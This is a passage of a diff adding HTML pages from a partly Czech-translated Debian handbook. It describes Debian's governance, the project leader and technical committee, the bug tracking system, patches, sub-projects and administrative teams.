+            class="indexterm"></a><a
+            id="id-1.4.6.5.17"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.18"
+            class="indexterm"></a><div
+            class="para">
+				Stanovy definují určitý počet rolí a postů, plus jejich odpovědnosti a pravomoce. Zejména je třeba poznamenat, že vývojáři Debianu mají vždy konečný rozhodovací pravomoc hlasováním o obecném usnesení, kde je vyžadována kvalifikovaná většina tří čtvrtin (75%) hlasů pro učinění významných změn (např. s dopadem na dokumenty nadace). Nicméně, vývojáři každoročně volí “vedoucího”, aby je zastupoval na schůzkách, a zajistit vnitřní koordinaci mezi různými týmy. Tato volba je vždy obdobím intenzivních diskuzí. Role vedoucího není formálně definována žádným dokumentem: kandidáti na tento post obvykle navrhují vlastní definice pozice. V praxi role vedoucího zahrnuje zastupování vůči sdělovacím prostředkům, koordinaci mezi “interními” týmy a zajišťování celkového vedení projektu, na kterém se vývojáři mohou podílet: záměry DPL jsou implicitně schvalovány většinou členů projektu.
+			</div><div
+            class="para">
+				V podstatě má vedoucí opravdové pravomoce; jejich zvolení vzešla z těsných hlasování; mohou učinit jakékoli rozhodnutí, které již není pod pravomocí někoho jiného a mohou delegovat části svých povinností.
+			</div><a
+            id="id-1.4.6.5.21"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.22"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.23"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.24"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.25"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.26"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.27"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.28"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.29"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.30"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.31"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.32"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.33"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.34"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.35"
+            class="indexterm"></a><div
+            class="para">
+				Since its inception, the project has been successively led by Ian Murdock, Bruce Perens, Ian Jackson, Wichert Akkerman, Ben Collins, Bdale Garbee, Martin Michlmayr, Branden Robinson, Anthony Towns, Sam Hocevar, Steve McIntyre, Stefano Zacchiroli, Lucas Nussbaum, Mehdi Dogguy and Chris Lamb.
+			</div><a
+            id="id-1.4.6.5.37"
+            class="indexterm"></a><div
+            class="para">
+				Stanovy rovněž definují “technickou komisi”. Hlavní úlohou této komise je rozhodovat v technických otázkách, pokud se zúčastnění vývojáři mezi sebou nedohodnou. Jinak má tato komise roli rádce pro vývojáře, kterému se nepodařilo učinit rozhodnutí, za které má odpovědnost. Je důležité poznamenat, že se zapojí pouze v případě, kdy je k tomu jednou ze zainteresovaných stran vyzvána.
+			</div><a
+            id="id-1.4.6.5.39"
+            class="indexterm"></a><div
+            class="para">
+				A konečně stanovy definují pozici “tajemníka projektu”, který má na starosti organizaci hlasování v souvislosti s různými volbami a obecnými usneseními.
+			</div><div
+            class="para">
+				The “general resolution” procedure is fully detailed in the constitution, from the initial discussion period to the final counting of votes. The most interesting aspect of that process is that when it comes to an actual vote, developers have to rank the different ballot options between them and the winner is selected with a <a
+              href="https://en.wikipedia.org/wiki/Condorcet_method">Condorcet method</a> (more specifically, the Schulze method). For further details see: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.debian.org/devel/constitution.en.html">http://www.debian.org/devel/constitution.en.html</a></div>
+			</div><a
+            id="id-1.4.6.5.42"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.43"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Flamewar, diskuse, která zachytí požár</strong></p></div></div></div><a
+              id="id-1.4.6.5.44.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.44.3"
+              class="indexterm"></a><div
+              class="para">
+				“Flamewar” je mimořádně vášnivá debata, která často končí s lidmi napadajícími se navzájemm, jakmile všechny rozumné argumentace byly vyčerpána na obou stranách. Některá témata jsou častěji předmětem polemik než ostatní (volba textového editoru, “dáváte přednost <code
+                class="command">vi</code> nebo <code
+                class="command">emacsu</code>?”, je staré oblíbené). Tyto věci často vyvolávají velmi rychlé výměny emailů v důsledku velkého počtu lidí se stanoviskem k této záležitosti (všichni) a velmi osobní povahu takových námitek.
+			</div><div
+              class="para">
+				Obecně, nic zvlášť užitečného z takových diskusí nevzejde; Všeobecné doporučení je zůstat mimo takové debaty a asi rychle prolistovat jejich obsah, protože jejich čtení v plném rozsahu by bylo příliš časově náročné.
+			</div></div><div
+            class="para">
+				I když stanovy vytváří zdání demokracie, denní realita je zcela odlišná: Debian přirozeně dodržuje pravidla svobodného softwaru do-ocracie: ten, kdo dělá věci rozhoduje, jak je dělat. Mnoho času může být vyplýtváno debatováním o jednotlivých přínosech různých cest, jak přistupovat k problému; zvolené řešení bude to první, která je obojí - funkční a uspokojující..., které vyjde z času, který do něj způsobilá osoba vložila.
+			</div><div
+            class="para">
+				To je jediný způsob, jak si vysloužit ostruhy: udělat něco užitečného a ukázat, že se pracovalo dobře. Mnoho “administrativních” týmů Debianu působí za pomocí kooptace, upřednostňující dobrovolníky, kteří již efektivně přispěli a prokázali svou schopnost. Veřejná podstata práce těchto týmů umožňuje novým přispěvatelům pozorovat a začít pomáhat bez zvláštních privilegií. Proto je Debian často popisován jako “meritokracie”.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Meritokracie, vláda znalostí</strong></p></div></div></div><a
+              id="id-1.4.6.5.47.2"
+              class="indexterm"></a><div
+              class="para">
+				Meritokracie je forma vlády, v níž je autorita vykonávána těmi, kteří mají největší zásluhy. Pro Debian, jsou zásluhy měřítkem kompetence, která je sama o sobě, posuzována sledováním dřívějších činností jednoho nebo více lidí v rámci projektu (Stefano Zacchiroli, bývalý vedoucí projektu, hovoří o “do-okracii”, což znamená “moc pro ty, kteří věci dělají”). Jejich prostá existence dokazuje určitou úroveň kompetence; jejich úspěchy obecně je svobodný software, s dostupným zdrojovým kódem, který může být snadno přezkoumán ostatními k posouzení jejich kvality.
+			</div></div><div
+            class="para">
+				Tato účinná operativní metoda zaručuje kvalitu přispěvatelů v “klíčových” týmech Debianu. Tato metoda není v žádném případě dokonalá a občas se vyskytnou tací, kteří nepřijmou tento způsob fungování. Výběr vývojářů přijatých do týmů se může zdát trochu svévolný, nebo dokonce nespravedlivý. Navíc, ne každý má stejnou představu o službách očekávaných od těchto týmů. Pro někoho je nepřijatelné muset čekat osm dní pro zahrnutí nového debianovského balíčku, zatímco ostatní budou trpělivě čekat tři týdny bez problémů. Jako takové, se pravidelně vyskytují stížnosti od těch nespokojených na “kvalitu služeb” některých týmů.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KOMUNITA</em></span> Začleňování nových správců</strong></p></div></div></div><a
+              id="id-1.4.6.5.49.2"
+              class="indexterm"></a><div
+              class="para">
+				Tým, který má na starosti přijímání nových vývojářů, je pravidelně nejvíce kritizován. Je třeba uznat, že v průběhu let se debianovský projekt stává stále náročnějším pro vývojáře, které bude přijímat. Někteří lidé v tom mohou vidět nespravedlnost, musíme ale přiznat, že to, co se jevilo jako malá výzva na začátku se stalo výzvou mnohem větší ve společenství čítajícím více než 1 000 lidí, pokud jde o zajištění kvality a integrity všeho, co Debian produkuje pro své uživatele.
+			</div><a
+              id="id-1.4.6.5.49.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.49.5"
+              class="indexterm"></a><div
+              class="para">
+				Dále, postup přijetí je ukončen přezkoumáním kandidatury malým týmem - account manažery Debianu. Tito manažeři jsou také obzvláště vystaveni kritice, protože mají konečné slovo v přijetí nebo odmítnutí dobrovolníka v rámci komunity vývojářů Debianu. V praxi, musí někdy zpozdit přijetí osoby, aby se dozvěděli více o činnosti projektu. Člověk může samozřejmě přispívat k Debianu i před přijetím za oficiálního vývojářáře tím, že je zaštiťován vývojáři současnými.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.6.6"></a>1.3.2. Aktivní role uživatelů</h3></div></div></div><div
+            class="para">
+				Jeden by mohl nadnést, zda je vůbec důležité zmiňovat uživatele zároveň s těmi, kteří pracují v rámci projektu Debian, ale odpověď je definitivní ano: hrají důležitou roli v projektu. Někteří uživatelé jsou daleko od toho být nazýváni “pasivními”, někteří spouštějí vývojové verze Debianu a pravidelně zakládají hlášení o chybách a upozorňují na problémy. Jiní jdou ještě dál a předkládají nápady pro zlepšení tím, že podávají hlášení o chybě s úrovní závažnosti “přání”, nebo dokonce předkládají opravy zdrojového kódu nazvané “patche” (viz postranní informace <a
+              class="xref"
+              href="sect.debian-internals.html#sidebar.patch"><span
+                class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Patch, způsob zasílání oprav</a>).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.bts"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NÁSTROJ</em></span> Systém na sledování chyb</strong></p></div></div></div><a
+              id="id-1.4.6.6.3.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.3.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.3.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.3.5"
+              class="indexterm"></a><div
+              class="para">
+				Sledovcí systém chyb Debianu (Debian BTS) je používán velkými částmi projektu. Veřejná část (webové rozhraní) umožňuje uživatelům zobrazit všechny ohlášené chyby, s možností zobrazit seřazený seznam chyb vybraných podle různých kritérií, jako například: dotčený balíček, závažnost, stav, adresa ohlašovatele, adresa zodpovědného správce, tag, apod. Je také možné procházet celý historický výpis všech diskusí týkajících se jednotlivých chyb.
+			</div><div
+              class="para">
+				Pod povrchem je Debian BTS založen na e-mailu: všechny informace, které uchovává, pocházejí ze zpráv odeslaných různými osobami. Všechny e-maily odeslané na <code
+                class="email"><a
+                  class="email"
+                  href="mailto:12345@bugs.debian.org">12345@bugs.debian.org</a></code> budou tedy přiřazeny k historii chyby číslo 12345. Oprávněné osoby mohou chybu “uzavřítٌ” napsáním zprávy popisující důvody rozhodnutí o uzavření na <code
+                class="email"><a
+                  class="email"
+                  href="mailto:12345-Done@bugs.debian.org">12345-Done@bugs.debian.org</a></code> (chyba je uzavřena, pokud je uvedený problém vyřešen nebo již není relevantní). Nová chyba je hlášena zasláním e-mailu na <code
+                class="email"><a
+                  class="email"
+                  href="mailto:Submit@bugs.debian.org">Submit@bugs.debian.org</a></code> podle konkrétního formátu, který identifikuje dotyčný balíček. Adresa <code
+                class="email"><a
+                  class="email"
+                  href="mailto:Control@bugs.debian.org">Control@bugs.debian.org</a></code> umožňuje editaci všech “meta-informací” vztahujících se k chybě.
+			</div><div
+              class="para">
+				The Debian BTS has other functional features, as well, such as the use of tags for labeling bugs. For more information, see <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/Bugs/">https://www.debian.org/Bugs/</a></div>
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SLOVNÍČEK</em></span> Závažnost chyby</strong></p></div></div></div><a
+              id="id-1.4.6.6.4.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.4.3"
+              class="indexterm"></a><div
+              class="para">
+				Závažnost chyby formálně přiřazuje reportovanému problému stupeň důležitosti. V praxi, ne všechny chyby mají stejnou důležitost; například překlep na stránce manuálu se nemůže rovnat bezpečnostnímu riziku v softwaru serveru.
+			</div><div
+              class="para">
+				Debian uses an extended scale to describe the severity of a bug. Each level is defined precisely in order to facilitate the selection thereof. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/Bugs/Developer#severities">https://www.debian.org/Bugs/Developer#severities</a></div>
+			</div></div><div
+            class="para">
+				Additionally, numerous satisfied users of the service offered by Debian like to make a contribution of their own to the project. As not everyone has appropriate levels of expertise in programming, they may choose to assist with the translation and review of documentation. There are language-specific mailing lists to coordinate this work. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://lists.debian.org/i18n.html">https://lists.debian.org/i18n.html</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/international/">https://www.debian.org/international/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Co je to i18n a l10n?</strong></p></div></div></div><a
+              id="id-1.4.6.6.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.6.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.6.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.6.5"
+              class="indexterm"></a><div
+              class="para">
+				“i18n” a “l10n” jsou zkratky slov “internacionalizace” a “lokalizace”, respektive, ponechání prvního a posledního písmena z každého slova a počet písmen uprostřed.
+			</div><div
+              class="para">
+				“Internacionalizování” programu spočívá v jeho modifikaci, kdy může být přeložen (lokalizován). To obnáší částečné přepsání programu původně napsaného pro fungování v jednom jazyku za účelem možnosti jeho otevření ve všech jazycích.
+			</div><div
+              class="para">
+				“Lokalizace” programu spočívá v překladu původních zpráv (často v angličtině) do jiného jazyka. Abychom toho dosáhli, musí být již program internacializován.
+			</div><div
+              class="para">
+				Abychom to shrnuli, internacionalizace připravuje software pro překlad, který je potom spuštěn lokalizací.
+			</div></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.patch"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Patch, způsob zasílání oprav</strong></p></div></div></div><a
+              id="id-1.4.6.6.7.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.7.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.7.4"
+              class="indexterm"></a><div
+              class="para">
+				Patch je soubor popisující změny, které mají být provedeny na jednom nebo více odkazovaných souborech. Konkrétně, obsahuje seznam řádků k odstranění nebo přidání do kódu, stejně jako (někdy) řádky odebrané z referenčního textu, nahrazující modifikace v kontextu (umožňující identifikaci umístění změn, pokud čísla řádlů byla změněna).
+			</div><div
+              class="para">
+				Nástroj používaný pro uplatnění modifikací předávaných v takovém souboru je jednoduše nazýván <code
+                class="command">patch</code>. nástroj, který jej vytváří se jmenuje <code
+                class="command">diff</code> a používá se takto:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>diff -u file.old file.new &gt;file.patch</code></strong></pre><div
+              class="para">
+				Soubor <code
+                class="filename">file.patch</code> obsahuje instrukce pro provedení obsahových změn <code
+                class="filename">file.old</code> na <code
+                class="filename">file.new</code>. Můžeme jej poslat někomu, kdo jej dokáže použít k vytvoření <code
+                class="filename">file.new</code> z těch ostatních dvou, tímto způsobem:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>patch -p0 file.old &lt;file.patch</code></strong></pre><div
+              class="para">
+				Soubor, <code
+                class="filename">file.old</code>, je nyní identický s <code
+                class="filename">file.new</code>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NÁSTROJ</em></span> Nahlásit chybu <code
+                        class="command">reportbugem</code></strong></p></div></div></div><a
+              id="id-1.4.6.6.8.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.8.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.6.8.4"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="command">reportbug</code> tool facilitates sending bug reports on a Debian package. It helps making sure the bug in question hasn't already been filed, thus preventing redundancy in the system. It reminds the user of the definitions of the severity levels, for the report to be as accurate as possible (the developer can always fine-tune these parameters later, if needed). It helps writing a complete bug report without the user needing to know the precise syntax, by writing it and allowing the user to edit it. This report will then be sent via an e-mail server (by default, a remote one run by Debian, but <code
+                class="command">reportbug</code> can also use a local server).
+			</div><div
+              class="para">
+				Tento nástroj se nejdříve zaměřuje na vývojové verze, což je místo, kde jsou chyby opraveny. V praxi nejsou chyby ve stabilní verzi Debianu vítány, s velmi málo vyjímkami pro bezpečnostní aktualizace nebo důležité aktualizace (pokud, například, balíček vůbec nefunguje). Náprava menší chyby v debianovském balíčku musí tak počkat na další stabilní verzi.
+			</div></div><div
+            class="para">
+				Všechny tyto příspěvkové mechanismy se stávají více efektivními díky chování uživatelů. Uživatelé jsou daleko tomu být skupinou izolovaných osob, jsou naopak komunitou, kde se spousta výměnných činností děje. Obzvláště sledujeme obdivuhodnou aktivitu na diskuzních emailových seznamech uživatelů, <code
+              class="email"><a
+                class="email"
+                href="mailto:debian-user@lists.debian.org">debian-user@lists.debian.org</a></code> (<a
+              class="xref"
+              href="solving-problems.html">7 – „<em>Solving Problems and Finding Relevant Information</em>“</a> se tomu detailněji věnuje).
+			</div><div
+            class="para">
+				Nejen, že uživatelé pomáhají sobě (i ostatním) s technickými věcmi, které se jich bezprostředně týkají, ale také diskutují o nejlepších způsobech, jak přispět k debianovskému projektu a posunout jej dál - diskutování, které často vede k návrhům na vylepšení.
+			</div><div
+            class="para">
+				Protože Debian nevydává žádné prostředky na žádnou sebepropagační kampaň, jeho uživatelé hrají podstatnou roli v jeho rozšiřování a tím upevňování jeho věhlasu prostřednictvím osobních rozhovorů apod.
+			</div><div
+            class="para">
+				This method functions quite well, since Debian fans are found at all levels of the free software community: from install parties (workshops where seasoned users assist newcomers to install the system) organized by local LUGs or “Linux User Groups”, to association booths at large tech conventions dealing with Linux, etc.
+			</div><div
+            class="para">
+				Volunteers make posters, brochures, stickers, and other useful promotional materials for the project, which they make available to everyone, and which Debian provides freely on its website and on its wiki: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/events/material">https://www.debian.org/events/material</a></div>
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.6.7"></a>1.3.3. Týmy a podprojekty</h3></div></div></div><div
+            class="para">
+				Debian byl od samého počátku organizován kolem konceptu zdrojových balíčků, každý se svým správcem nebo skupinou správců. Časem se vytvořilo hodně pracovních týmů, zabezpečujících administrativu infrastruktury, řízení úkolů nepatřících k žádnému konlrétnímu balíčku (zajišťování kvality, zásady Debianu, instalace, apod.), spolu s posledními týmy, které vyrostly kolem podprojektů.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.sub-projects"></a>1.3.3.1. Současné podprojekty Debianu</h4></div></div></div><div
+              class="para">
+					To each their own Debian! A sub-project is a group of volunteers interested in adapting Debian to specific needs. Beyond the selection of a sub-group of programs intended for a particular domain (education, medicine, multimedia creation, etc.), sub-projects are also involved in improving existing packages, packaging missing software, adapting the installer, creating specific documentation, and more.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Sub-project and derivative distribution</strong></p></div></div></div><a
+                id="id-1.4.6.7.3.3.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.3.3.3"
+                class="indexterm"></a><div
+                class="para">
+					The development process for a derivative distribution consists in starting with a particular version of Debian and making a number of modifications to it. The infrastructure used for this work is completely external to the Debian project. There isn't necessarily a policy for contributing improvements. This difference explains how a derivative distribution may “diverge” from its origins, and why they have to regularly resynchronize with their source in order to benefit from improvements made upstream.
+				</div><div
+                class="para">
+					On the other hand, a sub-project can not diverge, since all the work on it consists of directly improving Debian in order to adapt it to a specific goal.
+				</div><div
+                class="para">
+					The most known distribution derived from Debian is, without a doubt, Ubuntu, but there are many. See <a
+                  class="xref"
+                  href="derivative-distributions.html">A – „<em>Derivative Distributions</em>“</a> to learn about their particularities and their positioning in relationship to Debian.
+				</div></div><div
+              class="para">
+					Here is a small selection of current sub-projects:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							Debian-Junior, by Ben Armstrong, offering an appealing and easy to use Debian system for children;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian-Edu, by Petter Reinholdtsen, focused on the creation of a specialized distribution for the academic world;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian Med, by Andreas Tille, dedicated to the medical field;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian Multimedia which deals with audio and multimedia work;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian-Desktop which focuses on the desktop and coordinates artwork for the default theme;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian GIS which takes care of Geographical Information Systems applications and users;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Debian Accessibility, finally, improving Debian to match the requirements of people with disabilities.
+						</div></li></ul></div><div
+              class="para">
+					This list will most likely continue to grow with time and improved perception of the advantages of Debian sub-projects. Fully supported by the existing Debian infrastructure, they can, in effect, focus on work with real added value, without worrying about remaining synchronized with Debian, since they are developed within the project.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.6.7.4"></a>1.3.3.2. Administrative Teams</h4></div></div></div><div
+              class="para">
+					Most administrative teams are relatively closed and recruit only by cooptation. The best means to become a part of one is to intelligently assist the current members, demonstrating that you have understood their objectives and methods of operation.
+				</div><div
+              class="para">
+					The ftpmasters are in charge of the official archive of Debian packages. They maintain the program that receives packages sent by developers and automatically stores them, after some checks, on the reference server (<code
+                class="literal">ftp-master.debian.org</code>).
+				</div><div
+              class="para">
+					They must also verify the licenses of all new packages, in order to ensure that Debian may distribute them, prior to including them in the corpus of existing packages. When a developer wishes to remove a package, they address this team through the bug tracking system and the <span
+                class="emphasis"><em>ftp.debian.org</em></span> “pseudo-package”.
+				</div><a
+              id="id-1.4.6.7.4.5"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> The pseudo-package, a monitoring tool</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.6.2"
+                class="indexterm"></a><div
+                class="para">
+					The bug tracking system, initially designed to associate bug reports with a Debian package, has proved very practical to manage other matters: lists of problems to be resolved or tasks to manage without any link to a particular Debian package. The “pseudo-packages” allow, thus, certain teams to use the bug tracking system without associating a real package with their team. Everyone can, thus, report issues that needs to be dealt with. For instance, the BTS has a <span
+                  class="emphasis"><em>ftp.debian.org</em></span> entry that is used to report and track problems on the official package archive or simply to request removal of a package. Likewise, the <span
+                  class="emphasis"><em>www.debian.org</em></span> pseudo-package refers to errors on the Debian website, and <span
+                  class="emphasis"><em>lists.debian.org</em></span> gathers all the problems concerning the mailing lists.
+				</div></div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.gitlab"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> GitLab, Git repository hosting and much more</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.7.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.7.3"
+                class="indexterm"></a><div
+                class="para">
+					A GitLab instance, known as <code
+                  class="literal">salsa.debian.org</code>, is used by Debian to host the Git packaging repositories but this software offers much more than simple hosting and Debian contributors have been quick to leverage the continuous integration features (running tests, or even building packages, on each push). Debian contributors also benefit from a cleaner contribution workflow thanks the well understood merge request process (similar to GitHub's pull requests).
+				</div><div
+                class="para">
+					GitLab replaced FusionForge (which was running on a service known as <code
+                  class="literal">alioth.debian.org</code>) for collaborative package maintainance. This service is administered by Alexander Wirt, Bastian Blank and Jörg Jaspert. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://salsa.debian.org/">https://salsa.debian.org/</a></div> <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://wiki.debian.org/Salsa/Doc">https://wiki.debian.org/Salsa/Doc</a></div>
+				</div></div><div
+              class="para"><a
+                xmlns=""
+                id="dsa-team"></a>
+					The <span
+                class="emphasis"><em>Debian System Administrators</em></span> (DSA) team (<code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-admin@lists.debian.org">debian-admin@lists.debian.org</a></code>), as one might expect, is responsible for system administration of the many servers used by the project. They ensure optimal functioning of all base services (DNS, Web, e-mail, shell, etc.), install software requested by Debian developers, and take all precautions in regards to security. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://dsa.debian.org">https://dsa.debian.org</a></div>
+				</div><a
+              id="id-1.4.6.7.4.9"
+              class="indexterm"></a><a
+              id="id-1.4.6.7.4.10"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> Debian Package Tracker</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.11.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.3"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.4"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.5"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.6"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.7"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.8"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.9"
+                class="indexterm"></a><div
+                class="para">
+					This is one of Raphaël's creations. The basic idea is, for a given package, to centralize as much information as possible on a single page. Thus, one can quickly check the status of a program, identify tasks to be completed, and offer one's assistance. This is why this page gathers all bug statistics, available versions in each distribution, progress of a package in the <span
+                  class="distribution distribution">Testing</span> distribution, the status of translations of descriptions and debconf templates, the possible availability of a new upstream version, notices of noncompliance with the latest version of the Debian Policy, information on the maintainer, and any other information that said maintainer wishes to include. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://tracker.debian.org/">https://tracker.debian.org/</a></div>
+				</div><div
+                class="para">
+					An e-mail subscription service completes this web interface. It automatically sends the following selected information to the list: bugs and related discussions, availability of a new version on the Debian servers, new translations available for proofreading, etc.
+				</div><div
+                class="para">
+					Advanced users can, thus, follow all of this information closely and even contribute to the project, once they have got a good enough understanding of how it works.
+				</div><div
+                class="para">
+					Another web interface, known as <span
+                  class="emphasis"><em>Debian Developer's Packages Overview</em></span> (DDPO), provides each developer a synopsis of the status of all Debian packages placed under their charge. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://qa.debian.org/developer.php">https://qa.debian.org/developer.php</a></div>
+				</div><div
+                class="para">
+					These two websites are tools developed and managed by the group responsible for quality assurance within Debian (known as Debian QA).
+				</div><a
+                id="id-1.4.6.7.4.11.15"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.11.16"
+                class="indexterm"></a></div><div
+              class="para">
+					The <span
+                class="emphasis"><em>listmasters</em></span> administer the e-mail server that manages the mailing lists. They create new lists, handle bounces (delivery failure notices), and maintain spam filters (unsolicited bulk e-mail).
+				</div><a
+              id="id-1.4.6.7.4.13"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> Traffic on the mailing lists: some figures</strong></p></div></div></div><a
+                id="id-1.4.6.7.4.14.2"
+                class="indexterm"></a><a
+                id="id-1.4.6.7.4.14.3"
+                class="indexterm"></a><div
+                class="para">
+					The mailing lists are, without a doubt, the best testimony to activity on a project, since they keep track of everything that happens. Some statistics (from 2017) regarding our mailing lists speak for themselves: Debian hosts more than 250 lists, totaling 217,000 individual subscriptions. The 27,000 messages sent each month generate 476,000 e-mails daily.
+				</div></div><div
+              class="para">
+					Each specific service has its own administration team, generally composed of volunteers who have installed it (and also frequently programmed the corresponding tools themselves). This is the case of the bug tracking system (BTS), the package tracker, <code
+                class="literal">salsa.debian.org</code> (GitLab server, see sidebar <a
+                class="xref"
+                href="sect.debian-internals.html#sidebar.gitlab"><span
+                  class="emphasis"><em>TOOL</em></span> GitLab, Git repository hosting and much more</a>), the services available on <code
+                class="literal">qa.debian.org</code>, <code
+                class="literal">lintian.debian.org</code>, <code
+                class="literal">buildd.debian.org</code>, <code
+                class="literal">cdimage.debian.org</code>, etc.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.4.6.7.5"></a>1.3.3.3. Development Teams, Transversal Teams</h4></div></div></div><div
+              class="para">
+					Unlike administrative teams, the development teams are rather widely open, even to outside contributors. Even if Debian does not have a vocation to create software, the project needs some specific programs to meet its goals. Of course, developed under a free software license, these tools make use of methods proven elsewhere in the free software world.
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.git"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
